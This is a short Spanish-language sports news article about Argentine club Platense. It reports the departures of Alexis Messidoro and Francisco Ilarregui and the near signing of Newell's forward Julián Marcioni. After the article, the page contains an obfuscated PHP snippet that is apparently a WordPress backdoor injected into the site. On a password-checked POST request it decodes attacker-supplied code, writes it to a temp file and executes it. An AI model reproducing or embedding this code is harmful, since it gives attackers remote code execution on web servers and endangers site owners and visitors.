Platense: dos bajas confirmadas y un refuerzo cerca

Foto: Prensa Platense

Alexis Messidoro y Francisco Ilarregui rescindieron sus contratos con Platense, de común acuerdo con los directivos. Y Julián Marcioni, delantero de Newell’s, está a un paso de convertirse en el primer refuerzo. 

Messidoro, tras su regreso al país después de haber jugado en Estudiantes de Mérida, de Venezuela, en octubre del pasado apenas disputó 6 partidos entre Liga Profesional y Primera Nacional, anotando 1 gol (a Atlanta).

Ilarregui se incorporó a principios de este año y sumó apenas unos mintuos ante Godoy Cruz y Sarmiento, por la Copa de la Liga. Regresa anticipadamente a Argentinos Juniors, club que lo había cedido a préstamo. 

Marcioni, delantero de 23 años, es jugador de Newell’s y las dos pasadas temporadas estuvo a préstamo en Independiente Rivadavia y luego en Atlanta. Las negociaciones para ser prestado también a Platense están muy avanzadas y se cerrarían en las próximas horas. 

El equipo que ahora dirige Leonardo Madelón ya se había desprendido de otro de sus últimos refuerzos: Cristian Núñez, interrumpiendo su préstamo de Lanús. Además, Ian Puleio pasó a Toreros FC, filial del Barcelona de Ecuador tras un convenio entre el conjunto de Guayaquil, presidido por Carlos Alfaro Moreno, y Platense.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}